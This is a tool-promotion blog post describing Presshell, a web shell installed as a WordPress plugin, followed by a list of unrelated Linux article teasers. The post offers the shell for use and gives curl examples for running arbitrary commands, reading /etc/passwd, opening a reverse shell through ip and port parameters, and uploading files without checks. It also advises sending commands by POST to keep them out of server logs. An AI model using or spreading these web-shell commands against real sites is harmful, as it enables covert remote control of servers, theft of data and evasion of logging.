Kali Linux

Presshell : Quick And Dirty WordPress Command Execution Shell

Presshell is a tool for Quick & dirty WordPress Command Execution Shell. Execute shell commands on your wordpress server. Uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php

Installation

To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.

Simply upload the zip file located in the Releases section as a new extension and you’re good to go.

Usage

Using the shell is straightforward. Simply pass sh commands as an argument to the shell :

❯ curl ‘http://host/…/shell.php?cmd=uname+-a’
Linux wordpress-server 2.6.32-21-generic-pae #
32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php

More complex commands are also supported, careful about your quoting though

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=cat /etc/passwd | grep -v “(false|nologin)”‘
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=python -c “from urllib.parse import urlencode; print(urlencode({\”cmd\”: \”uname -a\”}))”‘
cmd=uname+-a

You can also open a reverse shell using the ip and port parameters. The default port is 443.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’ –data-urlencode ‘port=1337’

There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.

❯ curl ‘http://host/…/shell.php’ -F ‘file=@some_file’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
some_file

R K

Recent Posts

WhatsMyName App – Find Anyone Across 640+ Platforms

Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…

5 days ago

Analyzing Directory Size Linux Tools Explained

Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…

5 days ago

Understanding Disk Usage with du Command

Efficient disk space management is vital in Linux, especially for system administrators who manage servers…

5 days ago

How to Check Directory Size in Linux

Knowing how to check directory sizes in Linux is essential for managing disk space and…

5 days ago

Essential Commands for Linux User Listing

Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…

5 days ago

Command-Line Techniques for Listing Linux Users

Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…

6 days ago